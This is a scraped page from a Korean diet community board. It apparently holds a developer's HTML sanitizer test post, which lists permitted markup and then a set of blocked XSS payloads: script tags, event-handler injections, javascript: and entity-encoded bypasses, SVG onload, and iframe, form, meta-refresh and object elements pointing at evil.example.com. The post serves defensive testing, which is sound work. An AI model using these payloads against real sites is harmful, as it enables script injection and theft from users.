다이어트 톡

Iframe 백엔드 테스트

2026.04.09 12:33

조회 0추천 0스크랩 0

<h1>Sanitize 테스트</h1>

<!-- ✅ 허용: 기본 서식 -->
<p><strong>볼드</strong> <em>이탤릭</em> <u>밑줄</u> <s>취소선</s></p>
<blockquote>인용문입니다</blockquote>
<pre><code>코드 블록</code></pre>
<ul><li>목록1</li><li>목록2</li></ul>
<ol><li>번호1</li><li>번호2</li></ol>

<!-- ✅ 허용: 이미지 -->
<img src="https://via.placeholder.com/300x100" alt="정상이미지" width="300">

<!-- ✅ 허용: 링크 -->
<a href="https://google.com" target="_blank" rel="noopener">정상 링크</a>

<!-- ✅ 허용: YouTube -->
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ" width="560" height="315" allowfullscreen></iframe>

<!-- ✅ 허용: Vimeo -->
<iframe src="https://player.vimeo.com/video/76979871" width="640" height="360"></iframe>

<!-- ✅ 허용: 테이블 -->
<table><thead><tr><th>이름</th><th>나이</th></tr></thead><tbody><tr><td>홍길동</td><td>30</td></tr></tbody></table>

<!-- ✅ 허용: 스타일/클래스 -->
<div class="ql-editor" style="color: red; font-size: 18px;">스타일 적용 텍스트</div>

<!-- ❌ 차단: script -->
<script>alert('XSS-script')</script>

<!-- ❌ 차단: onerror -->
<img src="x" onerror="alert('XSS-onerror')">

<!-- ❌ 차단: onmouseover -->
<div onmouseover="alert('XSS-hover')">마우스 올려보세요</div>

<!-- ❌ 차단: onclick -->
<a href="#" onclick="alert('XSS-onclick')">클릭해보세요</a>

<!-- ❌ 차단: javascript scheme -->
<a href="javascript:alert('XSS-href')">javascript href</a>

<!-- ❌ 차단: 허용 안된 iframe -->
<iframe src="https://evil.example.com/steal"></iframe>

<!-- ❌ 차단: form -->
<form action="https://evil.example.com"><input type="text" value="탈취"><button>전송</button></form>

<!-- ❌ 차단: meta refresh -->
<meta http-equiv="refresh" content="0;url=https://evil.example.com">

<!-- ❌ 차단: object/embed -->
<object data="https://evil.example.com/mal.swf"></object>
<embed src="https://evil.example.com/mal.swf">

<!-- ❌ 차단: SVG XSS -->
<svg onload="alert('XSS-svg')"><circle r="50"></circle></svg>

<!-- ❌ 차단: 대소문자 우회 -->
<ScRiPt>alert('XSS-case')</ScRiPt>

<!-- ❌ 차단: HTML 인코딩 우회 -->
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS-encode')">인코딩 우회</a>

<!-- ❌ 차단: 이벤트 핸들러 변형 -->
<img src=x onerror=alert`XSS-backtick`>

<!-- ❌ 차단: body onload -->
<body onload="alert('XSS-body')">

<!-- ❌ 차단: style 태그 -->
<style>body{background:url('javascript:alert(1)')}</style>

<!-- ❌ 차단: data scheme 이미지 -->
<img src="data:text/html,<script>alert('XSS-data')</script>">

\n\n\n

마우스 올려보세요

\n\n\n클릭해보세요\n\n\njavascript href\n\n\n\n\n\n\n\n\n\n\n\n

\n\n\n\n\n\n\n\n\n인코딩 우회\n\n\n

\n\n\n\n\n\n\n\n\n

alert('XSS-data')\">", "articleBody": "

Sanitize 테스트

\n\n\n

볼드 이탤릭 밑줄 ~~취소선~~

인용문입니다

코드 블록

목록1
목록2

번호1
번호2

\n\n\n $\"정상이미지\"$ \n\n\n정상 링크\n\n\n\n\n\n\n\n\n

이름	나이
홍길동	30

\n\n\n

스타일 적용 텍스트

\n\n\n\n\n\n

\n\n\n

마우스 올려보세요

\n\n\n클릭해보세요\n\n\njavascript href\n\n\n\n\n\n\n\n\n\n\n\n

\n\n\n\n\n\n\n\n\n인코딩 우회\n\n\n

\n\n\n\n\n\n\n\n\n

alert('XSS-data')\">", "video": [], "interactionStatistic": [], "isPartOf": { "@type": "WebPage", "identifier": "990512", "name": "다이어트 톡", "url": "https://test.geniet.co.kr/community/diet_talk", "relatedLink": [ "https://test.geniet.co.kr/community/diet_talk/2414836", "https://test.geniet.co.kr/community/diet_talk/2414611", "https://test.geniet.co.kr/community/diet_talk/2414543", "https://test.geniet.co.kr/community/diet_talk/2414539", "https://test.geniet.co.kr/community/diet_talk/2414538", "https://test.geniet.co.kr/community/diet_talk/2414537", "https://test.geniet.co.kr/community/diet_talk/2414510", "https://test.geniet.co.kr/community/diet_talk/2414358", "https://test.geniet.co.kr/community/diet_talk/2414353", "https://test.geniet.co.kr/community/diet_talk/2413904", "https://test.geniet.co.kr/community/diet_talk/2413065", "https://test.geniet.co.kr/community/diet_talk/2413062", "https://test.geniet.co.kr/community/diet_talk/2412851", "https://test.geniet.co.kr/community/diet_talk/2412726", "https://test.geniet.co.kr/community/diet_talk/2412698", "https://test.geniet.co.kr/community/diet_talk/2412697", "https://test.geniet.co.kr/community/diet_talk/2412696", "https://test.geniet.co.kr/community/diet_talk/2412114", "https://test.geniet.co.kr/community/diet_talk/2410783", "https://test.geniet.co.kr/community/diet_talk/2407293" ] }, "comment": [] }

한식

밥 / 도시락

김치

찜

비빔밥 / 덮밥

구이 / 볶음

족발 / 보쌈

전

반찬

기타

다이어트

식단관리

저당식품 / 저당소스

커피 / 음료 / 탄산수

건강간식

쉐이크 / 보충제

닭가슴살

베이커리

기타

분식

순대

핫도그

떡볶이

김밥

오뎅 / 어묵

기타

농산

쌀 / 백미

잡곡 / 혼합곡

견과류

과일 / 건과 / 냉과

기타

채소

떡 / 베이커리 / 과자

샌드위치

아이스크림 / 빙수

빵 / 케이크

캔디 / 초콜릿 / 껌

시럽 / 잼

기타

축산

소고기

돼지고기

닭고기

오리고기

계란 / 알류

기타

패스트푸드

피자

치킨

햄버거

라면

기타

유제품 / 유아식

우유 / 두유

요거트 / 요구르트

치즈 / 버터

분유 / 이유식

기타

양식

파스타

샐러드

리조또

그라탕

수프

기타

아시안

쌀국수

똠양꿍

커리

나시고랭

팟타이

기타

음료

생수

탄산음료 / 탄산수

차 / 전통차

이온 / 에너지음료

주류

커피